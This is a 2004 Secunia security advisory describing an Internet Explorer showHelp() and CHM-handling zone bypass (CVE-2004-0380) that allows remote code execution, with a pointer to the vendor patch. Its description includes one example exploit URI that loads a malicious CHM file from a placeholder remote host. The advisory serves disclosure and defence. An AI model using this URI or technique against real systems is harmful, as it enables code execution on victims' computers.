|
Internet Explorer showHelp() Restriction Bypass Vulnerability
|
|
Secunia Advisory:
|
SA10523
|
|
|
Release Date:
|
2004-01-02
|
|
Last Update:
|
2004-04-14
|
|
Popularity:
|
55,228 views
|
|
|
Critical:
|
Highly critical
|
|
Impact:
|
Security Bypass
|
|
Where:
|
From remote
|
|
Solution Status:
|
Vendor Patch
|
|
| Software: | Microsoft Internet Explorer 5.01
Microsoft Internet Explorer 5.5
Microsoft Internet Explorer 6.x
|
|
|
Subscribe:
|
Instant alerts on relevant vulnerabilities 
|
| | CVE reference: | CVE-2004-0380
|
|
Description:
Variants of the older showHelp() zone bypass vulnerability have been discovered, which potentially can be exploited to compromise a user's system.
Remote and locally installed "CHM" help files can be opened by websites via either the "showHelp()" function or certain URI handlers like "ms-its:" and "mk:@MSITStore:". Remote files can execute code in context of the "Internet" security zone whereas local files may execute code with the privileges of the logged in user.
Normally, it isn't a problem that Internet Explorer allows websites to open locally installed "CHM" files as they are considered trusted.
However, there exists two problems within the handling of "CHM" files:
1) It is possible to treat other local files as "CHM" files by using a special syntax with a double ":" appended to the file name combined with a directory traversal using the "..//" character sequence.
This has been exploited via programs such as WinAmp, Flash Player, XMLHTTP, ADODB stream and others, which allow files with arbitrary content to be placed in known locations.
2) Files, which haven't been installed locally, may still execute arbitrary code in context of the "Local Zone" by referencing a non-existent file.
Example:
ms-its:mhtml:file://C:\does_not_exist.mhtml!http://[malicious_site]//malicious.chm::/evil.html"
The vulnerability can be exploited in Internet Explorer including the latest versions with all patches and service packs installed.
Solution:
See the following Secunia Advisory:
SA11067
Provided and/or discovered by:
Originally reported by Arman Nayyeri.
Changelog:
2004-03-29: Added more information about variants. Updated "Solution" section and increased criticality.
2004-04-07: Added link to US-CERT vulnerability note.
2004-04-14: Updated "Solution" section.
Other References:
Secunia Advisory including fix from Microsoft:
http://secunia.com/advisories/11067/
The old Internet Explorer showHelp() function vulnerability (SA8004):
http://secunia.com/advisories/8004/
US-CERT VU#323070:
http://www.kb.cert.org/vuls/id/323070
|
|
|
Track this Secunia Advisory
|
Customers of the Secunia Vulnerability Intelligence solutions will automatically receive updates when new information regarding this advisory is released.
Read more about our Vulnerability Intelligence solutions and what they can do for you and your company.
|
|
|
About this Secunia Advisory
|
Please note: The information that this Secunia Advisory is based on comes from a third party unless stated otherwise.
Secunia collects, validates, and verifies all vulnerability reports issued by security research groups, vendors, and others.
|
|
|
18th Nov, 2008
|
New advisories:
|
27 |
|
New vulnerabilities:
|
38 |
|
Updated advisories:
|
30 |
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
 Solutions | More...
|
|
